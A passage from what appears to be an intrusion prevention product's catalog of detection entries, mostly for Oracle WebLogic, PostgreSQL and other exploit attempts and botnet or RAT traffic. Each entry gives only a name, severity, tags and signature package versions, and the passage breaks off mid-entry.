Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Vulnerability: Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow
Description:
Back to top

Generic_CS-Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle Secure Backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service
Description:
Back to top

Generic_CS-Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Solaris detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Solaris, Any Hardware, CVE2017, Solaris not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-974-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Oracle Tuxedo detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Tuxedo, CVE2017, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure
Description:
Back to top

Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Tuxedo detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Tuxedo, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Vulnerability: Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1

About this situation: An attempt to exploit a vulnerability in Oracle Application Server Web Cache detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2004, Any Operating System not specific, Oracle Application Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-598-5211
Vulnerability: Oracle-Web-Cache-Unspecified-Client-Request-Handling
Description:
Back to top

Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-2

About this situation: An attempt to exploit a vulnerability in Oracle Application Server Web Cache detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2004, Any Operating System not specific, Oracle Application Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-598-5211
Vulnerability: Oracle-Web-Cache-Unspecified-Client-Request-Handling
Description:
Back to top

Generic_CS-Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1205-5242
Vulnerability: Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1246-5242
Vulnerability: Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection
Description:
Back to top

Generic_CS-Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection
Description:
Back to top

Generic_CS-Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Vulnerability: Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394
Description:
Back to top

Generic_CS-Oracle-WebLogic-Limitfilter-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle Coherence detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, Oracle Coherence, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1388-5242
Vulnerability: Oracle-WebLogic-Limitfilter-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Vulnerability: Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability

About this situation: A vulnerability in Oracle WebLogic Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1067-5242
Last changed: sgpkg-ips-1246-5242
Vulnerability: Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1698-5242
Vulnerability: Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1601-5242
Last changed: sgpkg-ips-1601-5242
Vulnerability: Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Node-Manager-Command-Execution

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-1733-5242
Vulnerability: Oracle-WebLogic-Server-Node-Manager-Command-Execution
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2018, CVE2019, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1153-5242
Vulnerability: Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization
Oracle-WebLogic-Server-RCE-Vulnerability-CVE-2019-2725
Description:
Back to top

Generic_CS-Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-860-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization
Description:
Back to top

Generic_CS-Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection
Description:
Back to top

Generic_CS-Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection
Description:
Back to top

Generic_CS-Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection
Description:
Back to top

Generic_CS-Oracle10g-TNS-Auth-Sesskey-BOF

About this situation: Attempt to exploit a buffer overflow in Oracle10g
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle 10g, CVE2009, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Oracle10g-TNS-Auth-Sesskey-BOF
Description:
Back to top

Generic_CS-Overly-Long-RTSP-Host-Header

About this situation: An overly long RTSP Host header detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: Overly-Long-RTSP-Host-Header
Description:
Back to top

Generic_CS-Pabueri.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Downloader.Pabueri.A-Botnet
Description:
Back to top

Generic_CS-Paradoxyhua-Linux-Infection-Traffic

About this situation: Paradoxyhua Linux infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Paradoxyhua-Botnet
Description:
Back to top

Generic_CS-Parallax-RAT-Traffic

About this situation: Parallax RAT traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: Parallax-RAT-Traffic
Description:
Back to top

Generic_CS-PeerCast-Request-Format-String

About this situation: Detected attempt to exploit a vulnerability in PeerCast
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PeerCast, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: PeerCast-Get-Request-Format-String
Description:
Back to top

Generic_CS-Persistent-Systems-Radia-Client-Automation-Command-Execution

About this situation: An attempt to exploit a vulnerability in Persistent Systems Radia Client Automation detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Persistent Systems Radia Client Automation, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: Persistent-Systems-Radia-Client-Automation-Command-Execution
Description:
Back to top

Generic_CS-PingPull-Trojan-C2-TCP-Traffic

About this situation: PingPull remote access trojan command and control traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Vulnerability: PingPull-Trojan-C2-Traffic
Description:
Back to top

Generic_CS-Pinkslip-Bot-Traffic

About this situation: PinkSlip bot traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Pinkslip-Bot
Description:
Back to top

Generic_CS-PostgreSQL-Bit-Substring-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in the PostgreSQL database server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-290-4219
Last changed: sgpkg-ips-290-4219
Vulnerability: PostgreSQL-Bit-Substring-Buffer-Overflow
Description:
Back to top

Generic_CS-PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in PostgreSQL PostgreSQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Vulnerability: PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass
Description:
Back to top

Generic_CS-PostgreSQL-Database-Datetime-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PostgreSQL PostgreSQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1377-5242
Vulnerability: PostgreSQL-Database-Datetime-Buffer-Overflow
Description:
Back to top

Generic_CS-PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PostgreSQL PostgreSQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1747-5242
Vulnerability: PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow
Description:
Back to top

Generic_CS-PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PostgreSQL Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-PostgreSQL-Database-Set-Role-Security-Bypass

About this situation: An attempt to exploit a vulnerability in PostgreSQL PostgreSQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-567-5211
Vulnerability: PostgreSQL-Database-Set-Role-Security-Bypass
Description:
Back to top

Generic_CS-PostgreSQL-Source-From-Tmp

About this situation: An attempt to exploit a vulnerability in the PostgreSQL database server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Vulnerability: PostgreSQL-Insecure-Library-Mapping-Vulnerability
Description:
Back to top

Generic_CS-Potential-Apache-Couchdb-Erlang-RCE

About this situation: An attempt to exploit a vulnerability in Apache CouchDB detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Apache Software Foundation CouchDB, CVE2022, Windows not specific, Unix not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1825-5242
Vulnerability: Apache-Couchdb-Erlang-RCE
Description:
Back to top

Generic_CS-Progea-Movicon-11-Server-Denial-Of-Service

About this situation: Progea Movicon 11 Server denial of service.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Progea Movicon, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Progea-Movicon-11-Server-Denial-Of-Service
Description:
Back to top

Generic_CS-Progress-WhatsUp-Gold-Directory-Traversal-CVE-2024-46909

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-46909
Description:
Back to top

Generic_CS-Progress-WhatsUp-Gold-Potential-Directory-Traversal-CVE-2024-46909

About this situation: A potential attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-46909
Description:
Back to top

Generic_CS-Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1807-5242
Vulnerability: Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883
Description:
Back to top

Generic_CS-Pushbot-Bot-Traffic

About this situation: Pushbot Bot traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Pushbot-Bot
Description:
Back to top

Generic_CS-Pushdo-B-Activity

About this situation: Pushdo.B activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Pushdo
Description:
Back to top

Generic_CS-Qakbot-Botnet-Traffic-4

About this situation: Qakbot C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1475-5242
Last changed: sgpkg-ips-1475-5242
Vulnerability: Qakbot-Botnet
Description:
Back to top

Generic_CS-Qemu-Monitor-HMP-Migrate-Command-Execution

About this situation: An attempt to exploit a vulnerability in QEMU's Monitor Human Monitor Interface (HMP) TCP server detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Linux, Any Hardware, QEMU, Unix not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1436-5242
Vulnerability: Qemu-Monitor-HMP-Migrate-Command-Execution
Description:
Back to top

Generic_CS-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection

About this situation: An attempt to exploit a vulnerability in QNAP HBS 3 Hybrid Backup Sync detected
Context: TCP Client Stream Unknown
Severity: 7
